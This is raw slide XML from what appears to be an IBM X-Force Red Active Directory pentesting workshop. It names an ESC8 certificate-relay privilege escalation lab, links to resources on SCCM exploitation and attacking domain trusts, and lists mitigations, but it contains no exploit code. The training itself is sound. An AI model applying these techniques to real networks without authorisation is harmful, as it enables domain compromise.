                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>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5324483" y="2600201"/>
            <a:ext cx="5051974" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="600" dirty="0"/>
              <a:t>Image From - https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58790F91-8D6D-3D82-0D84-A0FEE278457F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5061857" y="1138030"/>
            <a:ext cx="3705972" cy="1435608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="998646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ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DA Privilege Escalation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="770C28"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lab 5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>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67</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69496" y="750905"/>
            <a:ext cx="8580317" cy="3272575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ESC8 time! One of the quickest 0 to heroes in all of AD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, have fun!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1991782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4A7E-0A4A-4E4C-BBB7-24DCF88C0C61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177659" y="168516"/>
            <a:ext cx="9068753" cy="351402"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Going Further</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D696651B-2117-F140-B70E-1E9BF38484C1}"/>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51CB0152-7D68-B54E-9D92-25AC0EA81A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59395FB3-9C97-154F-86B2-7E381B951268}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43208311-B6DD-D44B-AD6A-8FC4ACF2CA0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179486" y="302355"/>
            <a:ext cx="8585883" cy="3706945"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="201930" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Microsoft Features for mitigation/prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>LAPS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>gMSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, CG, Device Guard, JEA, etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Caveats &amp; Cautions for each security controls </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>"Just turn on Credential Guard" </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SCCM </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.blackhillsinfosec.com/wp-content/uploads/2023/08/SLIDES_SCCM-Exploitation-The-First-Cred-Is-The-Deepest-II-Gabriel-Prudhomme-BHIS.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/garrettfoster13/sccmhunter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Domain Trusts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://harmj0y.medium.com/a-guide-to-attacking-domain-trusts-ef5f8992bb9d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://www.thehacker.recipes/ad/movement/trusts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://blog.harmj0y.net/redteaming/the-trustpocalypse/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://adsecurity.org/?p=425</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" charset="-120"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-171450">
              <a:buFont typeface="Arial" pitchFamily="2" charset="2"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C36B9D-CF36-F243-B92B-DA967E394F36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2281313" y="4805707"/>
            <a:ext cx="6840287" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3411436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4346-0C45-D745-B1FB-7BDA9B24BA4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="202971" y="1371985"/>
            <a:ext cx="6470333" cy="628777"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A2191F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Questions?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D6319F-033B-5546-BEA3-7FC2C4E182DB}"/>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38440A71-6CEE-7F4B-AB2E-F4ED40D436E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{59395FB3-9C97-154F-86B2-7E381B951268}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2487562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Lab Access (Teleport)</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2023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88050" y="610556"/>
            <a:ext cx="8569927" cy="3820293"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://slides.xfr.best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> to get a copy of these slides</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://signup.xfr.best</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> to signup for a machine and provide us your GitHub username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Once your GitHub username is added, we will manually add you into the right GitHub team so you have access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Once we have added your GitHub username, go to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://rtv.defcon.wtf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> to login with your GitHub credentials and access your machine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>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17958720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388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A89F-1559-F140-B16C-02CA0C3A8FAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181578" y="468392"/>
            <a:ext cx="4184047" cy="628097"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FBC84E4-44DE-D84C-825C-B094238BCDEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FOLLOW US ON:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ibm.com/security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>securityintelligence.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xforce.ibmcloud.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ibmsecurity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>youtube.com/ibmsecuritysolutions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="98729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Why is this all about Active Directory?</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r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Most enterprise networks run Windows (~88% of the operating system market share is Windows according to a random stat I pulled from a random site in 2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>The standard for managing major enterprise networks is Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:latin typeface="IBM Plex Sans" panose="020B0503050203000203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16390" name="Picture 6" descr="Managed Active Directory - Hybrid Cloud and IT Solutions">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47891934-5D2B-AF4A-98D1-9080FF1AA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87" y="1665435"/>
            <a:ext cx="762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512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532B-FB45-B545-B93E-E7E5F4BBAA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177660" y="168516"/>
            <a:ext cx="8169054" cy="292342"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Precursor &gt; Active Directory Meme</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A8518F3-4FA8-8945-9F07-61383A5281BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IBM Security X-Force Red / © 2022 IBM Corporation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6D0A8EE-EB49-A44C-83A7-768F933DD89A}"/>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D2CDA6A4-9F7F-3549-A896-C63D375DD497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177660" y="610556"/>
            <a:ext cx="8580317" cy="3272575"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
